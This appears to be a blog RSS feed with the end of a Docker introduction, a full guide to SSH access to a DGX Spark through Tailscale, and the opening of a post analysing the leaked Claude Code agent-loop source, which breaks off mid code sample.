<p><strong>What Nobody Tells You:</strong> Your Mac's fan spinning during Docker builds? That's the Linux VM doing the work. The VM has allocated CPU and memory from your Mac. If you're running 10 containers, they're all sharing one VM — not 10 separate machines. This is why Docker on Mac will never be as fast as Docker on Linux. The VM is the tax you pay.</p>
</blockquote>
<blockquote>
<p><strong>2026 Update:</strong> Apple released their own container tool, <a href="https://github.com/apple/container">Apple Containers</a>, which takes the opposite approach: one lightweight VM per container instead of one shared VM. It boots in under a second, has stronger isolation, and is written in Swift. It's interesting for macOS-native workflows, but Docker remains the standard for production, CI/CD, and cross-platform builds.</p>
</blockquote>
<hr />
<h2>Your First Containers (For Real This Time)</h2>
<p>Let's actually do this. Not <code>hello-world</code> — that's a toy. Let's run real software.</p>
<h3>Run an entire operating system</h3>
<pre><code class="language-bash">docker run --rm ubuntu bash -c "cat /etc/os-release &amp;&amp; uname -a"
</code></pre>
<pre><code class="language-console">PRETTY_NAME="Ubuntu 24.04.1 LTS"
NAME="Ubuntu"
VERSION_ID="24.04"
VERSION="24.04.1 LTS (Noble Numbat)"
VERSION_CODENAME=noble
Linux d50e9bad40e9 6.12.65-linuxkit #1 SMP Thu Jan 15 14:58:53 UTC 2026 aarch64 aarch64 aarch64 GNU/Linux
</code></pre>
<p>Look at that kernel version: <code>6.12.65-linuxkit</code>. That's the Linux VM's kernel. The Ubuntu "operating system" inside the container is sharing this kernel. There's no second kernel. Ubuntu here is just a filesystem — the binaries, libraries, and configs that make Ubuntu <em>Ubuntu</em>. The kernel comes from the host (or the VM on Mac).</p>
<p>This is why containers start in milliseconds instead of minutes. There's no OS to boot. It's just a process with a different filesystem view.</p>
<h3>Run a web server</h3>
<pre><code class="language-bash">docker run -d --name web -p 8080:80 nginx:alpine
</code></pre>
<pre><code class="language-console">$ docker ps
CONTAINER ID   IMAGE          STATUS         PORTS                                     NAMES
a45dc5a89844   nginx:alpine   Up 26 seconds  0.0.0.0:8080-&gt;80/tcp, [::]:8080-&gt;80/tcp   web
</code></pre>
<pre><code class="language-bash">curl -s http://localhost:8080 | head -5
</code></pre>
<pre><code class="language-console">&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Welcome to nginx!&lt;/title&gt;
&lt;style&gt;
</code></pre>
<p>That <code>-p 8080:80</code> is port mapping. The container's nginx listens on port 80 inside its <strong>network namespace</strong>. Docker maps your host's port 8080 to it. Traffic flows: your browser → host port 8080 → Docker networking → container port 80 → nginx process.</p>
<h3>Check what's happening inside</h3>
<pre><code class="language-bash">docker logs web
</code></pre>
<pre><code class="language-console">/docker-entrypoint.sh: Configuration complete; ready for start up
2026/04/12 08:10:22 [notice] 1#1: using the "epoll" event method
</code></pre>
<p>Logs. Real logs from the nginx process. Because that's all a container is — a process.</p>
<h3>Clean up</h3>
<pre><code class="language-bash">docker stop web &amp;&amp; docker rm web
</code></pre>
<p>Container stopped (process received SIGTERM). Container removed (namespaces and cgroups cleaned up). The filesystem? Gone too, unless you used a volume. We'll cover that on Day 4.</p>
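<p>The SIGTERM part is worth seeing from the process's side. <code>docker stop</code> sends SIGTERM first and falls back to SIGKILL if the process hasn't exited after a grace period (10 seconds by default). Below is a sketch of a process that handles the signal cleanly. <code>graceful_worker</code> is a hypothetical stand-in, not something from the nginx image.</p>
<pre><code class="language-bash"># Hypothetical stand-in for a containerized process that exits cleanly.
graceful_worker() {
  # Run cleanup and exit when SIGTERM arrives (what docker stop sends first).
  trap 'echo "caught SIGTERM, shutting down"; exit 0' TERM
  # Short sleeps keep the loop responsive: the trap runs between them.
  while :; do sleep 1; done
}
</code></pre>
<p>A process that ignores SIGTERM gets no such chance to clean up. It is simply killed once the grace period runs out.</p>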
<hr />
<h2>2026: Docker Isn't Just Containers Anymore</h2>
<p>Here's what separates learning Docker today from learning it in 2020.</p>
<h3><code>docker init</code> — Never write a Dockerfile from scratch</h3>
<pre><code class="language-bash">cd your-project/
docker init
</code></pre>
<p>Docker scans your project, detects the language (Python, Node.js, Go, Java, .NET), and generates a production-ready Dockerfile, compose.yaml, and .dockerignore. Multi-stage builds. Non-root users. Health checks. All generated in seconds.</p>
<h3><code>docker ai</code> — Ask Gordon</h3>
<pre><code class="language-bash">docker ai "How do I containerize a Flask app with Redis?"
</code></pre>
<p>Gordon is Docker's built-in AI assistant. It reads your project structure, your Dockerfile, your running containers — and gives you answers that actually understand your context. Not generic advice. Specific to your setup.</p>
<h3><code>docker model</code> — Run LLMs locally</h3>
<pre><code class="language-console">$ docker model status
Docker Model Runner is running

$ docker model list
MODEL NAME  PARAMETERS  QUANTIZATION    ARCHITECTURE  SIZE
smollm2     361.82 M    IQ2_XXS/Q4_K_M  llama         256.35 MiB
</code></pre>
<p>Docker Model Runner lets you pull and run AI models the way you pull Docker images. Powered by llama.cpp, exposed via OpenAI-compatible API, GPU-accelerated on Apple Silicon. Think of it as <code>docker run</code> but for LLMs. We'll deep-dive on Day 6.</p>
<h3><code>docker scout</code> — Know your vulnerabilities</h3>
<pre><code class="language-bash">docker scout quickview nginx:latest
</code></pre>
<p>Every image has dependencies. Dependencies have CVEs. Docker Scout scans layers, generates SBOMs (Software Bill of Materials), and shows you what's exposed. In March 2026, compromised Trivy images on Docker Hub stole CI/CD secrets from thousands of pipelines. Security scanning isn't optional anymore.</p>
<h3><code>docker debug</code> — Shell into anything</h3>
<pre><code class="language-bash">docker debug my-broken-container
</code></pre>
<p>Container has no shell? No curl? No debugging tools? <code>docker debug</code> injects a full toolbox into any container or image — even distroless, even crashing. It brings vim, curl, htop, and more. You can install additional tools on the fly.</p>
<hr />
<h2>What You Actually Learned Today</h2>
<p>Not "Docker is like a lightweight VM." You learned:</p>
<ul>
<li><p><strong>A container is a Linux process</strong> restricted by namespaces (what it can see) and cgroups (what it can use)</p>
</li>
<li><p><strong>Docker automates</strong> the creation of these restrictions, plus image management, networking, and storage</p>
</li>
<li><p><strong>On Mac</strong>, Docker runs a Linux VM because macOS has no Linux kernel — your containers live inside that VM</p>
</li>
<li><p><strong>In 2026</strong>, Docker is also an AI platform: Model Runner for local LLMs, Gordon for AI assistance, Scout for security scanning, Debug for troubleshooting, Init for project scaffolding</p>
</li>
</ul>
<hr />
<h2>Quick Reference</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What it does</th>
</tr>
</thead>
<tbody><tr>
<td><code>docker run -d -p 8080:80 nginx</code></td>
<td>Start a process with namespaces + port mapping</td>
</tr>
<tr>
<td><code>docker ps</code></td>
<td>List running container processes</td>
</tr>
<tr>
<td><code>docker logs &lt;name&gt;</code></td>
<td>View stdout/stderr of the process</td>
</tr>
<tr>
<td><code>docker top &lt;name&gt;</code></td>
<td>Show the actual PIDs on the host</td>
</tr>
<tr>
<td><code>docker stop &lt;name&gt;</code></td>
<td>Send SIGTERM to the process</td>
</tr>
<tr>
<td><code>docker rm &lt;name&gt;</code></td>
<td>Clean up namespaces, cgroups, filesystem</td>
</tr>
<tr>
<td><code>docker init</code></td>
<td>Generate Dockerfile for your project</td>
</tr>
<tr>
<td><code>docker ai "question"</code></td>
<td>Ask Gordon, Docker's AI assistant</td>
</tr>
<tr>
<td><code>docker model list</code></td>
<td>List locally available AI models</td>
</tr>
<tr>
<td><code>docker scout quickview &lt;image&gt;</code></td>
<td>Scan image for vulnerabilities</td>
</tr>
<tr>
<td><code>docker debug &lt;name&gt;</code></td>
<td>Shell into any container, even distroless</td>
</tr>
</tbody></table>
<hr />
<h2>Tomorrow: Day 2</h2>
<p>We're looking at images — not just "layers" but what they actually are: OCI artifacts containing filesystem snapshots. Why your images probably have dozens of vulnerabilities. How Docker Scout and Hardened Images change the game. And why the Trivy supply chain attack of March 2026 means security scanning is no longer optional.</p>
]]></content:encoded></item><item><title><![CDATA[SSH Into Your DGX Spark From Anywhere in the World Using Tailscale
]]></title><description><![CDATA[I recently got my hands on an NVIDIA DGX Spark, and the first thing I wanted to figure out was: how do I access this thing from anywhere? Whether I'm at a coffee shop, at a conference, or on a differe]]></description><link>https://blog.kubesimplify.com/ssh-into-your-dgx-spark-from-anywhere-in-the-world-using-tailscale</link><guid isPermaLink="true">https://blog.kubesimplify.com/ssh-into-your-dgx-spark-from-anywhere-in-the-world-using-tailscale</guid><category><![CDATA[NVIDIA]]></category><category><![CDATA[tailscale]]></category><category><![CDATA[DGXSpark]]></category><category><![CDATA[ssh]]></category><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Tue, 07 Apr 2026 12:01:10 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/73a73de4-7383-44be-8853-78e3cf47b306.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<hr />
<p>I recently got my hands on an NVIDIA DGX Spark, and the first thing I wanted to figure out was: <strong>how do I access this thing from anywhere?</strong> Whether I'm at a coffee shop, at a conference, or on a different network entirely — I want to just <code>ssh</code> in and get to work.</p>
<p>The answer? <strong>Tailscale.</strong> It took me about 10 minutes to set up, and now I can SSH into my Spark from any device, on any network, anywhere in the world. I even set up a friend with access — simultaneously — without giving them my credentials. Here's exactly how I did it.</p>
<h2>Why Tailscale?</h2>
<p>Tailscale creates a private mesh network (called a "tailnet") between your devices. No port forwarding, no static IPs, no VPN server to maintain. You install it on your devices, log in with the same account, and they can talk to each other. It's built on WireGuard, so it's fast and encrypted.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/471fb562-c707-46de-a4e1-a157f818ca08.png" alt="" style="display:block;margin:0 auto" />

<p>For the DGX Spark, this means:</p>
<ul>
<li><p>No need to be on the same WiFi network</p>
</li>
<li><p>No need to mess with your router settings</p>
</li>
<li><p>Works behind NATs and firewalls</p>
</li>
<li><p>Encrypted end-to-end</p>
</li>
</ul>
<h2>Prerequisites</h2>
<p>Before starting, make sure your DGX Spark:</p>
<ul>
<li><p>Is running Ubuntu 24.04 or newer</p>
</li>
<li><p>Has internet connectivity</p>
</li>
<li><p>Has a user account with sudo access</p>
</li>
</ul>
<p>Here's what my system looked like:</p>
<pre><code class="language-bash">$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 24.04.3 LTS
Release:    24.04
Codename:    noble
</code></pre>
<p>A quick ping to confirm internet:</p>
<pre><code class="language-bash">$ ping -c 3 google.com
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=1 ttl=118 time=15.3 ms
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=2 ttl=118 time=13.7 ms
64 bytes from tzdela-ba-in-x0e.1e100.net: icmp_seq=3 ttl=118 time=17.2 ms

--- google.com ping statistics ---
3 packets transmitted, 3 received, 0% packet loss
</code></pre>
<p>And verify sudo access:</p>
<pre><code class="language-bash">$ sudo whoami
root
</code></pre>
<p>Good to go.</p>
<h2>Step 1: Install Tailscale on the DGX Spark</h2>
<p>SSH into your Spark (or use a directly connected keyboard/monitor) and run:</p>
<pre><code class="language-bash"># Update package list and install prerequisites
sudo apt update
sudo apt install -y curl gnupg

# Add Tailscale signing key
curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.noarmor.gpg | \
  sudo tee /usr/share/keyrings/tailscale-archive-keyring.gpg &gt; /dev/null

# Add Tailscale repository
curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.tailscale-keyring.list | \
  sudo tee /etc/apt/sources.list.d/tailscale.list

# Install Tailscale
sudo apt update
sudo apt install -y tailscale
</code></pre>
<p>You'll see the repository being added and the package installing:</p>
<pre><code class="language-plaintext"># Tailscale packages for ubuntu noble
deb [signed-by=/usr/share/keyrings/tailscale-archive-keyring.gpg] https://pkgs.tailscale.com/stable/ubuntu noble main
...
Setting up tailscale (1.94.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/tailscaled.service → /usr/lib/systemd/system/tailscaled.service.
</code></pre>
<p>Verify the installation:</p>
<pre><code class="language-bash">$ tailscale version
1.94.2
  tailscale commit: 0a29cf18b56e478b9cd33af07755fcae90d5171a
  long version: 1.94.2-t0a29cf18b-g3f044c9f6
  go version: go1.25.5
</code></pre>
<p>Check the service is running:</p>
<pre><code class="language-bash">saiyam@spark-5223:~$ sudo systemctl status tailscaled --no-pager
[sudo] password for saiyam: 
● tailscaled.service - Tailscale node agent
     Loaded: loaded (/usr/lib/systemd/system/tailscaled.service; enabled; preset: enabled)
     Active: active (running) since Tue 2026-04-07 11:13:14 UTC; 9min ago
       Docs: https://tailscale.com/docs/
   Main PID: 2410 (tailscaled)
     Status: "Connected; saiyam911@gmail.com; 100.120.233.78 fd7a:115c:a1e0::f83a:e94e"
      Tasks: 22 (limit: 153561)
     Memory: 45.4M (peak: 53.7M)
        CPU: 615ms
     CGroup: /system.slice/tailscaled.service
             └─2410 /usr/sbin/tailscaled --state=/var/lib/tailscale/tailscaled.…
</code></pre>
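<p>On a fresh install, before you authenticate, the <code>Status</code> line reads "Needs login", and that's expected. The capture above was taken after I had already logged in, which is why it shows "Connected". We'll authenticate next.</p>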
<h2>Step 2: Connect the Spark to Your Tailnet</h2>
<p>This is the magic step:</p>
<pre><code class="language-bash">$ sudo tailscale up

To authenticate, visit:

    https://login.tailscale.com/a/1ff5e3e9017787
</code></pre>
<p>Open that URL in any browser, log in with your account (Google, GitHub, Microsoft — whatever your org uses), and you'll see:</p>
<blockquote>
<p><strong>Login successful. Your device spark-5223 is logged in</strong></p>
</blockquote>
<p>Back on the Spark terminal, you'll see:</p>
<pre><code class="language-plaintext">Success.
Some peers are advertising routes but --accept-routes is false
</code></pre>
<p>That's it on the Spark side. Your DGX Spark is now part of your private Tailscale network with the hostname <code>spark-5223</code>.</p>
<blockquote>
<p><strong>Note:</strong> The <code>--accept-routes</code> message is harmless for SSH access. You can ignore it. If you ever need subnet routing, run <code>sudo tailscale up --accept-routes</code>.</p>
</blockquote>
<h2>Step 3: Install Tailscale on Your Laptop</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/61787831-2a1e-4577-94a2-cdf279c2db4c.png" alt="" style="display:block;margin:0 auto" />

<h3>macOS</h3>
<ul>
<li><p><strong>Option A:</strong> Download from the <a href="https://apps.apple.com/app/tailscale/id1475387142">Mac App Store</a> (search "Tailscale")</p>
</li>
<li><p><strong>Option B:</strong> Download the <code>.pkg</code> from <a href="https://tailscale.com/download">tailscale.com/download</a></p>
</li>
</ul>
<p>Open the app, click <strong>Log in</strong>, and sign in with the <strong>same account</strong> you used on the Spark.</p>
<h3>Windows</h3>
<ol>
<li><p>Download the installer from <a href="https://tailscale.com/download">tailscale.com/download</a></p>
</li>
<li><p>Run the <code>.msi</code> file</p>
</li>
<li><p>Launch Tailscale from the system tray</p>
</li>
<li><p>Log in with the same account</p>
</li>
</ol>
<h3>Linux</h3>
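<p>Same commands as the Spark. These assume Ubuntu 24.04 (<code>noble</code>); on another Ubuntu release, swap <code>noble</code> for your codename in both URLs, and on other distributions follow the instructions at <a href="https://tailscale.com/download">tailscale.com/download</a>:</p>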
<pre><code class="language-bash">sudo apt update
sudo apt install -y curl gnupg

curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.noarmor.gpg | \
  sudo tee /usr/share/keyrings/tailscale-archive-keyring.gpg &gt; /dev/null

curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.tailscale-keyring.list | \
  sudo tee /etc/apt/sources.list.d/tailscale.list

sudo apt update
sudo apt install -y tailscale
sudo tailscale up
</code></pre>
<h2>Step 4: SSH Into Your Spark From Anywhere</h2>
<p>First, confirm both devices see each other:</p>
<pre><code class="language-bash">$ tailscale status
100.104.142.22  spark-5223           saiyamxxx@  linux  -
100.108.115.75  saiyams-macbook-pro  saiyam9xxx@  macOS  -
</code></pre>
<p>You should see your Spark listed. Now, simply:</p>
<pre><code class="language-bash">ssh saiyam@spark-5223
</code></pre>
<p>That's it. Tailscale's <strong>MagicDNS</strong> resolves <code>spark-5223</code> to the right Tailscale IP automatically. No need to remember IP addresses.</p>
<p>If MagicDNS isn't working for some reason, use the Tailscale IP directly:</p>
<pre><code class="language-bash"># Find the IP
tailscale status
# Look for spark-5223 and note the 100.x.x.x address

ssh saiyam@100.104.142.22
</code></pre>
<h3>Setting Up SSH Key Authentication</h3>
<p>For passwordless SSH access, set up key-based authentication. If you already have an SSH key (check <code>~/.ssh/id_ed25519.pub</code> or <code>~/.ssh/id_rsa.pub</code>), add it to the Spark:</p>
<pre><code class="language-bash"># Copy your public key to the Spark (will ask for password once)
ssh-copy-id saiyam@spark-5223
</code></pre>
<p>Or manually add it on the Spark:</p>
<pre><code class="language-bash"># On the Spark: create ~/.ssh if it doesn't exist, then append the public key
mkdir -p ~/.ssh
echo "your-public-key-here" &gt;&gt; ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
</code></pre>
<p>After that, SSH works without a password prompt.</p>
<blockquote>
<p><strong>Note:</strong> Password authentication still works alongside SSH keys. You don't have to choose one or the other.</p>
</blockquote>
<h2>What About My Second Laptop?</h2>
<p>This is the beauty of Tailscale — <strong>just install and log in</strong>:</p>
<ol>
<li><p>Install Tailscale on the second laptop (using the steps above for your OS)</p>
</li>
<li><p>Log in with the same account</p>
</li>
<li><p>Run <code>ssh saiyam@spark-5223</code></p>
</li>
</ol>
<p>No extra configuration on the Spark. Every device on your tailnet can reach every other device automatically.</p>
<h2>Sharing Your Spark With a Friend</h2>
<p>What if a friend also needs SSH access to your Spark — simultaneously, from their own laptop? You don't need to create a new Tailscale account for them. Use a <strong>pre-auth key</strong> to add their device to your tailnet.</p>
<h3>Generate a Pre-Auth Key</h3>
<ol>
<li><p>Go to the <a href="https://login.tailscale.com/admin/settings/keys">Tailscale Admin Console</a></p>
</li>
<li><p>Click <strong>"Generate auth key..."</strong></p>
</li>
<li><p>Enable <strong>Reusable</strong> if you want it to work for multiple devices</p>
</li>
<li><p>Set an expiration as needed</p>
</li>
<li><p>Copy the key (starts with <code>tskey-auth-...</code>)</p>
</li>
</ol>
<h3>Your Friend's Setup (macOS)</h3>
<ol>
<li><p>Install Tailscale from the <a href="https://apps.apple.com/app/tailscale/id1475387142">Mac App Store</a></p>
</li>
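<li><p><strong>Important:</strong> If they're already logged in to their own Tailscale account, they need to leave it first. If the terminal can't find the <code>tailscale</code> command, the macOS app bundles the CLI at <code>/Applications/Tailscale.app/Contents/MacOS/Tailscale</code>, which accepts the same subcommands:</p>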
<pre><code class="language-bash">sudo tailscale logout
</code></pre>
</li>
<li><p>Join your tailnet using the pre-auth key:</p>
<pre><code class="language-bash">sudo tailscale up --auth-key=tskey-auth-xxxxxxxxxxxx
</code></pre>
</li>
<li><p>That's it — their Mac is now on your tailnet. No login, no email needed.</p>
</li>
</ol>
<h3>Add Their SSH Key to the Spark</h3>
<p>Your friend should generate an SSH key on their Mac (if they don't have one):</p>
<pre><code class="language-bash">ssh-keygen -t ed25519
</code></pre>
<p>Then share their public key with you (the contents of <code>~/.ssh/id_ed25519.pub</code>). On the Spark, add it:</p>
<pre><code class="language-bash">echo "ssh-ed25519 AAAA...their-key-here... friend@hostname" &gt;&gt; ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
</code></pre>
<p>Now your friend can SSH in directly:</p>
<pre><code class="language-bash">ssh saiyam@spark-5223
</code></pre>
<p>No password prompt: the key handles authentication. SSH tries keys from the default locations (such as <code>~/.ssh/id_ed25519</code>) on its own, so your friend does <strong>not</strong> need to pass <code>ssh -i</code>.</p>
<p>Verify it all works:</p>
<pre><code class="language-bash">$ tailscale status
100.104.142.22  spark-5223           saiyamxxx@  linux  -
100.67.209.38   rohits-macbook-pro   saiyamxxx@  macOS  -
100.108.115.75  saiyams-macbook-pro  saiyamxxx@  macOS  -
</code></pre>
<p>Three devices, one tailnet, simultaneous SSH access.</p>
<blockquote>
<p><strong>Tip:</strong> You can manage access from the <a href="https://login.tailscale.com/admin/machines">Tailscale Admin Console</a>. To revoke someone's access, remove their device from the console and delete their key from <code>~/.ssh/authorized_keys</code> on the Spark.</p>
</blockquote>
<h2>Troubleshooting</h2>
<h3>"No Matching Peer" Error</h3>
<p>If your friend gets a "no matching peer" error when trying to SSH, it means <strong>they're on a different tailnet</strong> — not yours.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/55475e51-a4e7-4e4f-816b-91c7fae9c474.png" alt="" style="display:block;margin:0 auto" />

<p>The <code>100.x.x.x</code> Tailscale IPs are only reachable between devices on the <strong>same tailnet</strong>. The fix:</p>
<pre><code class="language-bash"># Friend logs out of their own tailnet
sudo tailscale logout

# Friend joins YOUR tailnet with your pre-auth key
sudo tailscale up --auth-key=tskey-auth-xxxxxxxxxxxx
</code></pre>
<h3>SSH Connection Timeout</h3>
<p>If <code>tailscale ping</code> works but SSH times out:</p>
<pre><code class="language-bash"># On the Spark — check SSH is running
sudo systemctl status ssh

# Check firewall isn't blocking
sudo ufw status

# If SSH isn't running
sudo systemctl start ssh

# If firewall is active and blocking
sudo ufw allow 22/tcp
</code></pre>
<p>Also check SSH is listening on all interfaces:</p>
<pre><code class="language-bash">$ sudo ss -tlnp | grep ':22 '
LISTEN  0  4096  0.0.0.0:22  0.0.0.0:*  users:(("sshd",...))
LISTEN  0  4096     [::]:22     [::]:*  users:(("sshd",...))
</code></pre>
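<p>If SSH is only listening on a specific IP, edit <code>/etc/ssh/sshd_config</code> to ensure <code>ListenAddress</code> is not restricted, then run <code>sudo systemctl restart ssh</code>. On Ubuntu 24.04, where <code>sshd</code> is socket-activated by default, you may also need <code>sudo systemctl daemon-reload</code> followed by <code>sudo systemctl restart ssh.socket</code> for the change to take effect.</p>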
<h3>Permission Denied (publickey, password)</h3>
<p>This means SSH connected but authentication failed. Either:</p>
<ul>
<li><p>Your SSH key isn't in <code>~/.ssh/authorized_keys</code> on the Spark</p>
</li>
<li><p>You're using a non-default key path (use <code>ssh -i /path/to/key</code>)</p>
</li>
<li><p>Password authentication is disabled in <code>/etc/ssh/sshd_config</code></p>
</li>
</ul>
<p>Check the authorized keys on the Spark:</p>
<pre><code class="language-bash">cat ~/.ssh/authorized_keys
</code></pre>
<p>Make sure your public key is listed there.</p>
<h2>Useful Commands Cheat Sheet</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What it does</th>
</tr>
</thead>
<tbody><tr>
<td><code>tailscale status</code></td>
<td>List all devices on your tailnet</td>
</tr>
<tr>
<td><code>tailscale ping spark-5223</code></td>
<td>Test connectivity to a device</td>
</tr>
<tr>
<td><code>tailscale ip</code></td>
<td>Show your device's Tailscale IP</td>
</tr>
<tr>
<td><code>ssh saiyam@spark-5223</code></td>
<td>SSH using MagicDNS hostname</td>
</tr>
<tr>
<td><code>sudo tailscale up</code></td>
<td>Connect to tailnet</td>
</tr>
<tr>
<td><code>sudo tailscale down</code></td>
<td>Disconnect from tailnet</td>
</tr>
<tr>
<td><code>sudo tailscale logout</code></td>
<td>Leave the current tailnet entirely</td>
</tr>
<tr>
<td><code>ssh-copy-id saiyam@spark-5223</code></td>
<td>Copy your SSH key to the Spark</td>
</tr>
</tbody></table>
<h2>Pro Tips</h2>
<ol>
<li><p><strong>Tailscale starts on boot</strong> — the <code>tailscaled</code> service is enabled by default, so your Spark will rejoin the tailnet automatically after a reboot.</p>
</li>
<li><p><strong>Forward ports for Jupyter</strong> — if you run JupyterLab on your Spark:</p>
<pre><code class="language-bash">ssh -L 8888:localhost:8888 saiyam@spark-5223
</code></pre>
<p>Then open <code>http://localhost:8888</code> in your browser.</p>
</li>
<li><p><strong>File transfers work too:</strong></p>
<pre><code class="language-bash">scp model.bin saiyam@spark-5223:~/models/
</code></pre>
</li>
<li><p><strong>Check who's connected</strong> — on the Spark, see active SSH sessions:</p>
<pre><code class="language-bash">who
</code></pre>
</li>
<li><p><strong>Tailscale admin console</strong> — monitor all devices, manage keys, and remove devices at <a href="https://login.tailscale.com/admin">login.tailscale.com/admin</a>.</p>
</li>
</ol>
<h2>Cleanup (If Needed)</h2>
<p>If you ever want to remove Tailscale from your Spark:</p>
<pre><code class="language-bash">sudo tailscale down
sudo apt remove --purge tailscale
sudo rm /etc/apt/sources.list.d/tailscale.list
sudo rm /usr/share/keyrings/tailscale-archive-keyring.gpg
sudo apt update
</code></pre>
<p>To restore it later, re-run Steps 1 and 2.</p>
<h2>Wrapping Up</h2>
<p>The whole setup took me about 10 minutes. Now I can SSH into my DGX Spark from my MacBook at home, my second laptop on the go, and even my friend can access it simultaneously from his MacBook — all without any port forwarding, static IPs, or VPN servers.</p>
<p>The key takeaways:</p>
<ul>
<li><p><strong>For yourself:</strong> Install Tailscale on both devices, log in with the same account, <code>ssh</code> in</p>
</li>
<li><p><strong>For friends:</strong> Generate a pre-auth key, have them join your tailnet, add their SSH public key to the Spark</p>
</li>
<li><p><strong>Troubleshooting:</strong> Make sure all devices are on the same tailnet, SSH is running, and keys are in <code>authorized_keys</code></p>
</li>
</ul>
<p>Just <code>ssh saiyam@spark-5223</code> — from anywhere in the world.</p>
<p>I also used this at 30,000 feet in the air!</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/1414da6d-8abe-4012-941e-081e310a16d4.png" alt="" style="display:block;margin:0 auto" />
<p><a class="embed-card" href="https://x.com/SaiyamPathak/status/2032098978213528037?s=20">https://x.com/SaiyamPathak/status/2032098978213528037?s=20</a></p>
]]></content:encoded></item><item><title><![CDATA[What Claude Code's Leaked Source Actually Teaches Us About Building AI Agents]]></title><description><![CDATA[Let me start with the honest version of what happened.
Yesterday, Anthropic accidentally published a 59.8 MB source map file inside version 2.1.88 of their @anthropic-ai/claude-code npm package. The b]]></description><link>https://blog.kubesimplify.com/claude-code-leak-what-the-source-actually-teaches</link><guid isPermaLink="true">https://blog.kubesimplify.com/claude-code-leak-what-the-source-actually-teaches</guid><category><![CDATA[ai agents]]></category><category><![CDATA[claude-code]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[AI Engineering]]></category><category><![CDATA[llm]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 01 Apr 2026 15:13:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0582a05f-42f3-4b97-8512-9c2133603126.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Let me start with the honest version of what happened.</p>
<p>Yesterday, Anthropic accidentally published a 59.8 MB source map file inside version 2.1.88 of their <code>@anthropic-ai/claude-code</code> npm package. The build pipeline was configured to generate source maps, and the packaging step (whether through a missing <code>.npmignore</code> rule or a misconfigured <code>files</code> field in <code>package.json</code>) failed to exclude them. One packaging oversight, and ~512,000 lines of TypeScript source were public. Anthropic's DMCA notice eventually took down over 8,100 GitHub repositories. A clean-room rewrite called <a href="https://github.com/instructkr/claw-code">claw-code</a> hit 50,000 stars in about two hours and now has more than 100,000.</p>
<p>Within the last 24 hours, the internet was flooded with hot takes. Architecture diagrams. The virtual pet system. Thread after thread of "I read the entire codebase and here's what I found." Sites like <a href="https://ccunpacked.dev">ccunpacked.dev</a> did genuinely good visual walkthroughs of the high-level structure.</p>
<p>But let's be real: nobody read 512,000 lines of TypeScript. I certainly didn't, and I'm skeptical of anyone who claims they did. What I did do was feed the source into Claude, systematically analyze the key modules, cross-reference what I found against public documentation and other analyses, and verify the claims I'm about to make against the actual code. If you've read other "I analyzed the leak" posts, they probably all used a similar workflow. The difference I'm going for here is honesty about the process.</p>
<hr />
<h2>The Core Loop Is a State Machine, and That's the Whole Point</h2>
<p>The agent loop lives in <code>query.ts</code>. It's exactly 1,729 lines (I checked), structured as an async generator function called <code>queryLoop</code> wrapping a <code>while(true)</code> loop. The code itself, in an internal comment, references "7 continue sites" — seven distinct points where the loop yields control and decides what to do next.</p>
<p>The actual function signature:</p>
<pre><code class="language-typescript">async function* queryLoop(
  params: QueryParams,
  consumedCommandUuids: string[],
): AsyncGenerator&lt;
  StreamEvent | RequestStartEvent | Message | TombstoneMessage | ToolUseSummaryMessage,
  Terminal
&gt;
</code></pre>
<p>Why does this matter? Because most agent frameworks treat the LLM call as the center of gravity. Send a prompt, get a response, run a tool, repeat. That works fine for demos. It falls apart the moment you need to pause a session, resume it later, serialize state, handle errors mid-turn, or compose multiple agents together.</p>
<p>The generator pattern makes every loop iteration an explicit state transition. You can yield control at each of the seven points without losing state. You can test individual stages. You can add compaction, permission checks, or budget tracking as stages rather than side effects bolted onto a callback chain.</p>
<p>If you're building an agent and your core loop is a simple <code>while</code> with <code>await model.chat()</code> in the middle, this is the pattern to study.</p>
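<p>To make the pattern concrete, here is a minimal sketch of a generator-driven loop. It is not Claude Code's <code>queryLoop</code>: the <code>LoopEvent</code> and <code>LoopState</code> types, <code>fakeModel</code>, and <code>runTool</code> are stand-ins I made up so the example runs on its own.</p>
<pre><code class="language-typescript">// Hypothetical event and state types for illustration; not Claude Code's real types.
type LoopEvent =
  | { kind: "model_response"; text: string }
  | { kind: "tool_result"; tool: string; output: string }
  | { kind: "done"; turns: number };

interface LoopState {
  messages: string[];
  turns: number;
}

// Stand-in for a model call: asks for one tool, then finishes.
async function fakeModel(messages: string[]): Promise&lt;{ text: string; toolCall?: string }&gt; {
  const sawToolResult = messages.some((m) =&gt; m.startsWith("tool:"));
  return sawToolResult
    ? { text: "All done." }
    : { text: "Let me list the files.", toolCall: "list_files" };
}

// Stand-in for tool execution.
async function runTool(name: string): Promise&lt;string&gt; {
  return `${name} returned 3 files`;
}

// Each `yield` is an explicit hand-off point: the caller can log, pause,
// persist `state`, or simply stop iterating to abandon the turn.
async function* agentLoop(state: LoopState, maxTurns = 5): AsyncGenerator&lt;LoopEvent, LoopState&gt; {
  while (true) {
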